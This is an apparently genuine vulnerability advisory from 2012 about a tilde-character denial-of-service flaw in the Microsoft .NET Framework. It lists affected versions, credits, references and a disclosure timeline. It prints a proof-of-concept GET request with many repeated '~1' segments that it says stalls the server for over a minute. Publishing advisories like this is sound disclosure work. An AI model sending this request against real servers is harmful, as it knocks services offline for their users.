Security Research - .Net Framework Tilde Character DoS
Website : http://soroush.secproject.com/blog/
I. BACKGROUND
---------------------
"The .NET Framework is a software framework developed by Microsoft that runs primarily on Microsoft Windows.
It includes a large library and provides language interoperability
across several programming languages." (Wikipedia)
II. DESCRIPTION
---------------------
Vulnerability Research Team discovered a vulnerability
in Microsoft .NET Framework.
The vulnerability is caused by a tilde character "~" in a Get request, which could allow remote attackers
to Deny the functionality of the server.
III. AFFECTED PRODUCTS
---------------------------
.Net Framework 1.0 Windows XP
.Net Framework 1.1 Windows 2003
.Net Framework 2.0 Windows 2003 R2
.Net Framework 3.0 Windows 2008
.Net Framework 3.5 Windows 2008 R2
.Net Framework 4.0 Windows 2008 R2,Windows 7
IV. Binary Analysis & Exploits/PoCs
---------------------------------------
In-depth technical analysis of the vulnerability and a functional exploit
are available through:
http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/
Example:
Loading time (less than 5 seconds):
http://server/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A.aspx
Loading time (long time - more than a minute):
http://server/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1.AsPx
V. SOLUTION
----------------
There are still workarounds through Vendor and security vendors.
VI. CREDIT
--------------
This vulnerability was discovered by:
Soroush Dalili (@irsdl)
Ali Abbasnejad
VII. REFERENCES
----------------------
http://support.microsoft.com/kb/142982/en-us
http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/
VIII. DISCLOSURE TIMELINE
-----------------------------
2010-08-01 - Vulnerability Discovered
2010-08-03 - Vendor Informed
2010-12-01 - Vendor 1st Response
2011-01-04 - Vendor 2nd Response (next version fix)
2012-06-29 - Public Disclosure
